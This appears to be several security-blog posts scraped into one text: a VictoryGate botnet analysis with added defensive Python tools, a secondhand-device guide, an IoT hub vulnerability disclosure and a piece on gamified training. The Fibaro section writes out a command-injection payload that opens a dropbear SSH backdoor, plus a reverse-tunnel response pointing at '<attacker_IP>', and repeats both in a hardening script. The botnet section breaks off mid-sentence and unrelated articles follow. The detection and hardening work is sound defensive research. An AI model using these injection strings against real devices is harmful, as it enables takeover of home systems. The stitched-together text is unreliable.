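The propagation layout just described is easy to recognise on a drive once you know what to look for. The script below is an added example, not ESET’s tooling: it pairs each root-level .exe with a same-named original kept in a subdirectory of the drive root, which is the arrangement described above, and moves the decoys to a quarantine folder. The stash directory name in its constructed sample drive, the threshold of two matches before a directory is treated as a stash, and the dot-prefix fallback for “hidden” on non-Windows systems are assumptions of this example.

```python
"""Triage a removable drive for the VictoryGate USB propagation pattern.

Added example, not ESET's code. It looks for the layout described above:
a directory at the drive root holding the original files, and one .exe per
original at the root carrying the same name. The stash directory name, the
min_matches threshold and the non-Windows fallback for the hidden attribute
are assumptions of this example; the sample drive it builds is constructed.
"""
import os
import shutil
import tempfile
from dataclasses import dataclass

FILE_ATTRIBUTE_HIDDEN = 0x02   # Windows attribute bit, exposed via st_file_attributes


@dataclass
class Decoy:
    exe: str            # executable at the drive root that poses as a document
    original: str       # the real file inside the stash directory
    stash_hidden: bool  # whether the stash directory carries the hidden attribute

    @property
    def shown_as(self) -> str:
        """What Explorer displays for the decoy when known extensions are hidden."""
        return os.path.basename(self.exe)[:-4]


def is_hidden(path: str) -> bool:
    """Hidden attribute on Windows; dot-prefix convention elsewhere (portability assumption)."""
    attrs = getattr(os.stat(path), "st_file_attributes", None)
    if attrs is not None:
        return bool(attrs & FILE_ATTRIBUTE_HIDDEN)
    return os.path.basename(path).startswith(".")


def _impersonated_names(exe_name: str) -> set:
    """Names a decoy like 'report.docx.exe' or 'report.exe' would pass for."""
    base = exe_name[:-4].lower()
    return {base, os.path.splitext(base)[0]}


def find_decoys(drive_root: str, min_matches: int = 2) -> list:
    """Pair root-level .exe files with same-named originals kept in a subdirectory of the root."""
    exes = {}
    for name in os.listdir(drive_root):
        full = os.path.join(drive_root, name)
        if os.path.isfile(full) and name.lower().endswith(".exe"):
            for key in _impersonated_names(name):
                exes.setdefault(key, full)

    found = []
    for name in os.listdir(drive_root):
        stash = os.path.join(drive_root, name)
        if not os.path.isdir(stash):
            continue
        hidden = is_hidden(stash)
        pairs = []
        for orig in os.listdir(stash):
            orig_full = os.path.join(stash, orig)
            if not os.path.isfile(orig_full):
                continue
            for key in (orig.lower(), os.path.splitext(orig)[0].lower()):
                if key in exes:
                    pairs.append(Decoy(exes[key], orig_full, hidden))
                    break
        if len(pairs) >= min_matches:   # one coincidence is noise; several is the pattern
            found.extend(pairs)
    return found


def restore(decoys: list, quarantine_dir: str) -> int:
    """Move decoys into quarantine and the originals back to the drive root; returns the count."""
    os.makedirs(quarantine_dir, exist_ok=True)
    for d in decoys:
        root = os.path.dirname(d.exe)
        shutil.move(d.exe, os.path.join(quarantine_dir, os.path.basename(d.exe)))
        shutil.move(d.original, os.path.join(root, os.path.basename(d.original)))
    return len(decoys)


def root_listing(path: str) -> list:
    """Sorted names of the regular files directly inside path."""
    return sorted(n for n in os.listdir(path) if os.path.isfile(os.path.join(path, n)))


def build_sample_drive() -> str:
    """Constructed layout of a compromised drive (not a real capture); returns its root."""
    root = tempfile.mkdtemp(prefix="usb_")
    stash = os.path.join(root, ".originals")   # directory name is an assumption
    os.makedirs(stash)
    for name in ("report.docx", "photo.jpg", "notes.txt"):
        with open(os.path.join(stash, name), "w") as f:
            f.write("original content of " + name)
        with open(os.path.join(root, name + ".exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 32)       # stand-in for a compiled AutoIt decoy
    with open(os.path.join(root, "legit.exe"), "wb") as f:
        f.write(b"MZ" + b"\x00" * 32)           # an unrelated executable that must not be flagged
    return root


if __name__ == "__main__":
    drive = build_sample_drive()
    decoys = find_decoys(drive)
    for d in decoys:
        print(f"{d.shown_as!r} is really {d.exe} (original: {d.original}, stash hidden: {d.stash_hidden})")
    print("restored", restore(decoys, os.path.join(drive, "quarantine")), "files")
```

Point find_decoys() at the mount point of the drive. Because every decoy is a freshly compiled AutoIt script with randomised metadata, hashes are useless here; the structural pattern (a directory of originals mirrored by root-level executables) is what survives across samples, which is why the script keys on that rather than on file contents.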

This module is an approximately 200 MB .NET assembly that contains a huge array with garbage bytes. This is likely done to avoid scanning by some security products that have file size or other resource consumption limits. The array also contains a XORed and gzip-compressed DLL that, at runtime, is deciphered and loaded with a late binding call using the .NET Reflection API.
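Carving the embedded DLL out of the oversized assembly is the first step in analysing this module. The script below is an added example, not ESET’s code, and runs against a constructed blob rather than a VictoryGate sample. It assumes the XOR key is a single byte and that nothing else frames the gzip stream: it searches for the gzip magic as it would appear under each candidate key, inflates only at those hits, and keeps results that begin with an MZ header.

```python
"""Carve a single-byte-XORed, gzip-compressed payload out of a large blob.

Added example, not ESET's code. The page says the initial module's array
hides a XORed and gzip-compressed DLL; this example assumes a one-byte XOR
key and no other framing, and builds its own sample blob instead of using
a real VictoryGate binary.
"""
import gzip
import random
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"   # gzip ID bytes followed by the deflate method byte


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with key via a translation table (no per-byte Python loop)."""
    return data.translate(bytes(i ^ key for i in range(256)))


def _inflate_at(blob: bytes, off: int, key: int, chunk: int = 1 << 20):
    """Inflate a gzip stream starting at off, XORing only as much of the blob as the stream needs."""
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16+ selects gzip framing
    out = bytearray()
    for pos in range(off, len(blob), chunk):
        out += inflater.decompress(xor_bytes(blob[pos:pos + chunk], key))
        if inflater.eof:
            return bytes(out)
    return None    # ran off the end of the blob without a complete stream


def carve_xor_gzip(blob: bytes, require_pe: bool = True):
    """Yield (key, offset, payload) for each gzip stream found under a single-byte XOR key.

    Rather than XORing the whole blob 256 times, XOR the magic with each
    candidate key and search for that pattern; only the hits are inflated.
    """
    for key in range(256):
        needle = xor_bytes(GZIP_MAGIC, key)
        start = 0
        while (off := blob.find(needle, start)) >= 0:
            start = off + 1
            try:
                payload = _inflate_at(blob, off, key)
            except zlib.error:          # magic matched by chance; not a real stream
                continue
            if payload is None or (require_pe and not payload.startswith(b"MZ")):
                continue
            yield key, off, payload


def build_sample_blob(key: int = 0x5A, garbage: int = 4096) -> bytes:
    """Constructed stand-in for the assembly's byte array: garbage, XORed gzip(DLL), garbage."""
    rng = random.Random(1)                       # deterministic garbage
    fake_dll = b"MZ" + b"\x90" * 64 + b"constructed sample, not a real DLL"
    packed = xor_bytes(gzip.compress(fake_dll, mtime=0), key)
    junk = lambda: bytes(rng.getrandbits(8) for _ in range(garbage))
    return junk() + packed + junk()


if __name__ == "__main__":
    for key, off, payload in carve_xor_gzip(build_sample_blob()):
        print(f"key=0x{key:02x} offset={off} size={len(payload)} head={payload[:2]!r}")
```

On a real 200 MB sample the search itself is cheap because only the three magic bytes are compared per key; the expensive inflation happens only at hits. If the key turns out to be longer than one byte, the search needs a known-plaintext step against the fixed gzip header first, which this example does not attempt.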

The DLL itself contains a packed AutoIt-compiled script like the one seen in Figure 3, as well as the methods required to inject it into some legitimate Windows process. We’ve seen vbc.exe (Visual Basic Compiler) or csc.exe (Visual C# Compiler) being targeted.

The injection is done by creating an instance of the vbc.exe process in a suspended state, unmapping its memory sections and then loading the executable from memory. As can be seen in Figure 5, VictoryGate will use several undocumented NTAPI functions such as NtWriteVirtualMemory, rather than using the more common API function WriteProcessMemory, to avoid basic API-hooking detection.

Figure 5. vbc.exe process injection performed by VictoryGate

The injected AutoIt agent is responsible for communication with the C&C server, download and execution of the secondary payloads, and also will constantly scan to detect whether a new USB drive has been connected and, if so, will replace the files that it contains with propagation scripts and hide the original files.
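Neither the suspended start nor the NtWriteVirtualMemory call shows up in ordinary process-creation telemetry, but what the injection leaves behind does. The following is an added example, not ESET’s detection logic: it scores process-creation events using Sysmon Event ID 1 field names, looking for a .NET compiler started by an unexpected parent, a parent running from a user-writable profile path, and an empty command line. The parent allowlist, the path pattern and the score threshold are assumptions to be tuned per environment, and the sample events are constructed.

```python
"""Hunt process-creation events for the VictoryGate injection pattern.

Added example, not ESET's code. The write-up says the agent is injected
into vbc.exe or csc.exe launched in a suspended state. Process-creation
logs do not record that flag, so this scores what they do record. Field
names follow Sysmon Event ID 1; the parent allowlist, the user-writable
path pattern and the threshold are assumptions; the events are constructed.
"""
import re
from dataclasses import dataclass, field

COMPILERS = {"vbc.exe", "csc.exe"}
# Parents that legitimately drive the compilers; tune to the environment (assumption)
EXPECTED_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "aspnet_compiler.exe", "w3wp.exe"}
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Users\\[^\\]+\\Downloads|ProgramData|Temp)\\", re.I)
# First token of a Windows command line: a quoted path or a bare one, then the rest
FIRST_TOKEN = re.compile(r'^\s*("[^"]*"|\S+)\s*(.*)$', re.S)


@dataclass
class Finding:
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points: int, why: str) -> None:
        self.score += points
        self.reasons.append(why)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> Finding:
    """Score one event; anything that is not vbc.exe/csc.exe scores zero."""
    finding = Finding()
    if basename(ev.get("Image", "")) not in COMPILERS:
        return finding
    parent = ev.get("ParentImage", "")
    if basename(parent) not in EXPECTED_PARENTS:
        finding.add(1, f"unexpected parent {basename(parent) or '<none>'}")
    if USER_WRITABLE.search(parent):
        finding.add(2, "parent runs from a user-writable path")
    m = FIRST_TOKEN.match(ev.get("CommandLine", ""))
    args = m.group(2).strip() if m else ""
    if not args:   # a real build names source files or a response file
        finding.add(2, "compiler launched with no arguments")
    return finding


def hunt(events, threshold: int = 3) -> list:
    """Return (event, finding) pairs scoring at or above the threshold."""
    hits = []
    for ev in events:
        finding = score_event(ev)
        if finding.score >= threshold:
            hits.append((ev, finding))
    return hits


SAMPLE_EVENTS = [  # constructed, not taken from a real host
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig @"obj\Debug\App.csc.rsp"'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\ctfmon2.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\alice\AppData\Local\Temp\abc.cmdline"'},
]


if __name__ == "__main__":
    for ev, finding in hunt(SAMPLE_EVENTS):
        print(ev["Image"], "<-", ev["ParentImage"], finding.score, finding.reasons)
```

The fourth sample event (PowerShell compiling via Add-Type) deliberately scores below the threshold: it has an unexpected parent but a proper command line, which is the kind of benign noise a bare “csc.exe spawned by something other than MSBuild” rule would drown in.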

Communication with C&C servers

As mentioned before, the botmaster had the ability to send commands to the nodes to add new secondary payloads. These commands were issued in cleartext, using a custom protocol over uncommon ports. The following commands were supported:

Command   Description
!         The C&C tells the node to download a file from a given URL and then execute it. The node will also use the prefix to notify the C&C that the task has been completed without errors.
~         The node

Buying a secondhand device? Here’s what to keep in mind

If you’re trying to be responsible towards the planet, also be responsible to yourself and take these steps so that the device doesn’t end up costing you more than you’ve saved

According to a report released by the World Economic Forum, the world produced an estimated 50 million tons of electronic waste in 2018. This figure is expected to double in the upcoming years if we don’t change our consumer behavior. In a bid to reduce the stress on our planet, many people have started “going greener”. They have reduced their meat consumption, started to buy less “fast fashion” products and even increased their efforts in recycling… all in a bid to reduce their carbon footprint.

Another way to reduce waste and save your hard-earned money is by buying secondhand electronic devices, notably computers and smartphones – an option that’s especially worth discussing since today is Earth Day.

However, purchasing a secondhand device bears a certain risk since you don’t really know what the device has been through and how it has been used over its months or years of service. But the risks can be mitigated; read on.

Buying the device

When you’re choosing to buy a used device, you have a variety of sources to choose from. The first and probably the best choice is buying a refurbished device from an authorized seller. This basically means that the device has been cleaned and checked by the seller, both from the hardware and software sides. In some cases, you might even get a warranty on the device, which saves you from a headache if it starts failing shortly after purchase.

Alternatively, the other choice is resorting to buying from advertising websites and online marketplaces. In this case, you probably won’t have a chance to inspect the device personally before you order it. If you opt for this scenario, you should definitely use a reputable marketplace that has security measures to deal with scammers. Research the seller, look at their reviews and ask them questions about the device. When you’ve made up your mind, you should use a payment service that has purchase protection just to be safe.

What to do if I bought a secondhand computer?

If you didn’t buy refurbished, then purchasing the computer or laptop is just half of the battle. Now you have to check that everything is in running order. You have essentially bought a pig in a poke, so don’t rush into using the computer. If you turn it on and it already has a running operating system, don’t rush headlong into downloading your favorite programs or checking your social media. First, check that there aren’t any remnants of the previous owner’s data on the hard drive. Then download and install a reputable endpoint security product and scan the computer.

“Why?” you may ask. Well, you have no other reasonable way of knowing whether the seller installed any malicious code on the computer in an effort to defraud you. The computer may have a keylogger installed to gain access to the credentials of all your accounts or perhaps some other form of malware that can steal your data and transfer it to a remote server. Alternatively, any of the previously mentioned things can be present due to the owner failing to take the right precautions.

A green option – compared to replacing the hard drive in the computer with a new one – would involve wiping the drive. Hard drive manufacturers offer utilities that allow you to wipe your drive with varying degrees of security ranging from a single overwrite to multiple passes with random data and even specific security protocols. Once you’ve chosen and done one or the other, you should proceed and do a clean install of the OS of your choice. Adding an endpoint security solution to your computer for added protection will be more than a nice final touch, and you should be ready to go.

What to do if I bought a secondhand smartphone?

As with computers, the same logic applies to smartphones: if you haven’t bought it refurbished with a warranty, you have to get your hands dirty. After the smartphone checks out and has no signs of hardware damage, it’s time to see how the software is doing. If you start it up and it goes straight through the boot process without walking you through a setup process, you should immediately be suspicious. The former owner may have been lazy and not gone through the wiping process properly, or the device may contain some form of malware.

To wipe the phone securely, start by checking whether all of the services have been signed out; once you’ve done that, you should remove all the accounts associated with the phone. The next step is to encrypt the phone’s data. Since you don’t know what kind of data has been stored on the phone, it’s probably safer that way. You’ve finally made it to the factory reset step. The name of the option may vary from manufacturer to manufacturer but in the end, it should always do the same thing: reset the smartphone to factory settings. That means that everything is deleted or wiped, and it should revert to the state it was in when it came out of the box.

Hopefully these tips will help you on your quest to buy a secondhand device and we applaud you for being responsible to our planet. After all, it is the only one we have.

22 Apr 2020 – 11:30AM

Serious flaws found in multiple smart home hubs: Is your device among them?

In worst-case scenarios, some vulnerabilities could even allow attackers to take control over the central units and all peripheral devices connected to them

ESET IoT Research has found numerous serious security vulnerabilities in three different home hubs – Fibaro Home Center Lite, Homematic Central Control Unit (CCU2) and eLAN-RF-003. These devices are used to monitor and control smart homes and other environments in thousands of households and companies across Europe and beyond. Potential consequences of these weaknesses include full access to the central and peripheral devices in these monitored systems, and to the sensitive data they contain, unauthenticated remote code execution, and Man-in-the-Middle (MitM) attacks. While these hubs are predominantly used in home and small office environments, they also open a potential attack vector for enterprises. This trend is even more worrisome as more employees are working from home these days.

We have reported our findings described in this blogpost to the respective manufacturers. Fibaro has proven to be extraordinarily cooperative, fixing most of the reported issues within days. eQ‑3 followed the standard disclosure procedure and patched its devices within the standard 90-day period. Elko has patched some of the reported vulnerabilities of their device within the standard 90-day period. Other issues may have been fixed in newer generations of the devices but remain in the older ones, with the vendor claiming hardware and compatibility limitations.

The issues described in this article have been reported to the vendors – who have then released patches for most of them – in 2018. The publication has been delayed due to our focus on research into other vulnerabilities that were still active. Nonetheless, with the current heightened requirement for IoT security, we are releasing this compilation of older findings to further advise all owners of the affected devices to apply the latest updates to their devices to increase their security and reduce exposure to outside attacks.

Fibaro Home Center (HC) Lite

Figure 1. Fibaro Home Center (HC) Lite tested by ESET IoT Research team

Fibaro Home Center Lite is a home automation controller, designed to control a wide variety of peripheral devices in a smart home. Among other things, the manufacturer’s website promises simple setup and configuration, a user-friendly web interface, and compatibility with a range of sensors, actuators, remotes, IP cameras, and the popular home assistants Google Home and Amazon Alexa.

However, a thorough inspection of the device (firmware version 4.170) by the ESET IoT Research team uncovered a mixture of serious vulnerabilities that could have opened the door for outside attackers.

One combination of the flaws we found even allowed an attacker to create an SSH backdoor and gain full control over the targeted device.

Other issues we uncovered included:

- TLS connections were vulnerable to MitM attacks (due to missing certificate validation), allowing the attackers to:
  - use command injection;
  - gain root access by brute forcing a very short, hardcoded password stored in the file /etc/shadow in the device’s firmware.
- The hardcoded password salt (used by the SQLite database, which stores usernames and passwords) was easily accessible via Fibaro’s web interface scripts, allowing the attacker to replace user passwords and create new passwords.
- Requests to the device’s weather service (API) leaked the exact GPS coordinates of the device, since they were sent as part of unencrypted HTTP communications.

Fibaro Home Center Lite vulnerability

As designed, the remote management connection between Fibaro Home Center Lite and its cloud server is secured via a standard SSH tunnel, created in two steps:

1. Fibaro Home Center Lite sends two separate TLS-encrypted requests asking for the SSH server’s hostname and listening port, as seen in Figure 2.
2. Based on the information returned, Fibaro Home Center Lite creates a secured connection via an SSH tunnel to the specified SSH server.

Figure 2. TLS-encrypted requests sent by Fibaro Home Center Lite, vulnerable to MitM attack.

The full command from the device’s initialization shell script that is responsible for processing the data returned from these requests is as follows:

screen -d -m -S RemoteAccess ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R $PORT_Response:localhost:80 <user>@$IP_Response

The response values are passed to the command via the $IP_Response and $PORT_Response variables. Normally, this would allow the device to create an SSH tunnel through which it would forward its HTTP port 80 to the specified port on the remote SSH server.

Figure 3. TLS-encrypted requests sent by Fibaro Home Center Lite, vulnerable to MitM attack.

Gaining access to Fibaro Home Center Lite

To successfully infiltrate the process described above, ESET researchers created their own server that would accept the public key of the targeted device, to mimic the original Fibaro server (lb-1.eu.ra.fibaro.com). This MitM server (subsequently referred to as <attacker_IP>) uses port 666 for the attack and is set to accept the public key sent by Fibaro Home Center Lite – which we obtained from previous communication with the device.

Connection between Fibaro Home Center Lite and the MitM server is established due to Fibaro Home Center Lite failing to perform certificate verification on some TLS connections with the server, allowing any attacker to use fake certificates signed by their proxy server.

To make matters worse, intercepted TLS requests – intended to create the SSH tunnel between the device and the legitimate server – are vulnerable to command injection. By using the MitM server, attackers can replace the address of the original server lb-1.eu.ra.fibaro.com with whatever they wish. For example, the attacker can generate a malicious response with a command injection of the form 0\n-J\n/usr/sbin/dropbear${IFS}-p${IFS}666 (where \n denotes a newline character), which causes the respective command from the initialization shell script to fail and subsequently opens an SSH backdoor to Fibaro Home Center Lite.

After a while, Fibaro Home Center Lite requests the server’s IP address once again. Again, the request can be intercepted by the attacker and answered with the following: <attacker_IP>\n-R 6666:localhost:666.

On Fibaro Home Center Lite, this response is passed to the initialization shell script command, which results in creation of the intended SSH tunnel originally meant for the forwarding
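The two crafted responses work because the script substitutes them into the command unquoted and unvalidated. The following is an added example, not Fibaro’s or ESET’s code, that models that expansion and shows a hardened alternative. TEMPLATE is the command quoted above with the SSH user name replaced by a placeholder; treating each newline in the expanded string as a separate shell command is a simplified model of how the initialization script consumed the response; the validation rules in safe_tunnel_argv() are this example’s own and not the vendor’s patch.

```python
"""Unquoted shell expansion of the tunnel parameters, and a validated replacement.

Added example, not Fibaro's or ESET's code. TEMPLATE is the command quoted
above with the SSH user name replaced by a placeholder. Splitting the
expanded string on newlines is a simplified model of how the initialization
script consumed the response; the validation in safe_tunnel_argv() is this
example's own, not the vendor's fix.
"""
import ipaddress
import re

TEMPLATE = (
    "screen -d -m -S RemoteAccess ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key "
    "-R {port}:localhost:80 <user>@{ip}"
)

# The two crafted "IP address" responses from the write-up; "\n" is a real newline
BACKDOOR_RESPONSE = "0\n-J\n/usr/sbin/dropbear${IFS}-p${IFS}666"
TUNNEL_RESPONSE = "<attacker_IP>\n-R 6666:localhost:666"


def vulnerable_expand(ip_response: str, port_response: str) -> list:
    """Substitute the raw responses as the script did; return the lines the shell would execute."""
    expanded = TEMPLATE.format(port=port_response, ip=ip_response)
    # ${IFS} is the shell's field separator; with its default value it expands to whitespace,
    # which lets the payload carry spaces through a response that might not tolerate them
    return [line.replace("${IFS}", " ") for line in expanded.split("\n")]


# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.I,
)


def parse_host(value: str) -> str:
    """Accept an IP literal or a hostname; newlines, spaces, options and path characters are rejected."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME.match(value):
        return value
    raise ValueError(f"rejected host value {value!r}")


def parse_port(value: str) -> int:
    """Accept only a decimal TCP port."""
    if not value.isdigit() or not 1 <= int(value) <= 65535:
        raise ValueError(f"rejected port value {value!r}")
    return int(value)


def safe_tunnel_argv(ip_response: str, port_response: str) -> list:
    """Build the same tunnel as an argv list: no shell, so nothing in the response can become a command."""
    host = parse_host(ip_response)
    port = parse_port(port_response)
    return ["screen", "-d", "-m", "-S", "RemoteAccess",
            "ssh", "-y", "-K", "30", "-i", "/etc/dropbear/dropbear_rsa_host_key",
            "-R", f"{port}:localhost:80", f"<user>@{host}"]


if __name__ == "__main__":
    for line in vulnerable_expand(BACKDOOR_RESPONSE, "8022"):
        print("shell would run:", line)
    print(safe_tunnel_argv("203.0.113.5", "8022"))
    for bad in (BACKDOOR_RESPONSE, TUNNEL_RESPONSE):
        try:
            safe_tunnel_argv(bad, "8022")
        except ValueError as exc:
            print("blocked:", exc)
```

Under the vulnerable model the first response yields three shell lines: the original ssh command pointed at host “0” (which fails), a lone “-J”, and “/usr/sbin/dropbear -p 666”, which is the backdoor. The argv version passes the response only as data, and a syntax check on the host and port rejects both payloads before anything is launched. Neither replaces the underlying fix, which is to validate the server’s certificate on the TLS requests so the response cannot be substituted in the first place.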

How gamification can boost your cybersecurity training

Security is not a game, but learning about it could be – here’s why adding the fun factor can help employees become more cyber-aware

Since 2017, each April 21st we mark World Creativity and Innovation Day. It’s a day dedicated to celebrating creative and innovative thinking, but it doesn’t mean it has to be limited to the creative industry and arts. Applying that creativity and innovation to every field is essential – especially to ones that may be viewed as highly technical and a bit dull, such as cybersecurity.

Since human errors and mistakes are often to blame for many breaches, improving employee cybersecurity awareness should be at the forefront of most companies’ security training. And not just companies; millennials who grew up with the internet permeating all aspects of life are now raising children who can’t imagine a world without computers or the web. So, millennial parents should probably teach their children how to be safe on the interwebz and who knows, that may even motivate them to consider a career in cybersecurity.

Giving lectures or endless PowerPoint presentations doesn’t cut it anymore for many employees, since more often than not your audience won’t stay attentive throughout. The key isn’t just to demonstrate examples of phishing attacks or types of malware, but to hold your audience’s attention by making the whole exercise creative: that’s where gamification comes in.

The dictionary definition of gamification would be the adding of game principles, game thinking or game logic to a task to encourage participation – long story short, make training a game. By making learning more interactive and fun, you motivate the participants to engage more with the material and to practice. Since they try it out themselves, they can learn faster and commit the material to long-term memory.

One of the simplest examples of gamification when it comes to cybersecurity is phishing attacks. Instead of just demonstrating examples of phishing to your employees, you test them using a game or quiz where they’ll have to catch the phish.

To make the exercise even more rewarding, you can add points … and once employees have accumulated enough points, they can exchange them for prizes. Rewards keep them engaged and motivated to do their best while mastering the skills you want them to acquire. To put it in numbers: 8 in 10 employees feel more motivated when their training is gamified.

To up the stakes, you can also add leaderboards so that the employees are competing against each other. Healthy competition never hurts, and it also adds incentive since everybody wants to perform at least on the same level as their colleagues.

Gamifying training does bear fruit: the employees not only remain motivated and engaged, but their organization sees results as well. “Over the course of this last year, we had a 10% reduction in end user risk. Most organizations, when they get compromised, it happens because an end user has a weak password, gets phished or downloads malware. The amount of education you need to do around these things is incredible. One percent to 2% is a win, but a 10% reduction is remarkable,” George Gerchow, the chief security officer at Sumo Logic, told InfoSecurity Professional Magazine.

Employees are on the frontlines and mistakes are costly; in the event of a major cybersecurity breach or incident, though, it’s usually the executives who have to act and deal with the fallout. They are the ones who need to identify threats and make decisions, especially when time is of the essence. So, they need to train as well. And what better way to train than to experience a cyberattack – a simulated one, that is. You may have heard of the concept of war games; these are used by militaries all over the world to test out their theories and strategies without having to engage in actual hostilities.

A cyberattack simulation operates on the same premise: the company gets to test out its reaction times and defenses without incurring damage of any kind. Based on its results, it can then analyze the areas where its policies and skills were lacking and improve them. First and foremost, it is an educational exercise – but since it mimics real-life scenarios, it is easier to comprehend (simulated) attacks once you experience them than just reading about them. One such game was developed by PricewaterhouseCoopers.

Having a basic understanding of cybersecurity is a must in this day and age, and companies have to continuously train their employees and raise their awareness of the threats they face. Having a creative and innovative approach to training can make a huge difference – not only will it be engaging for employees, but it is more likely they will be more proficient in identifying cyber-threats.

21 Apr 2020 – 11:30AM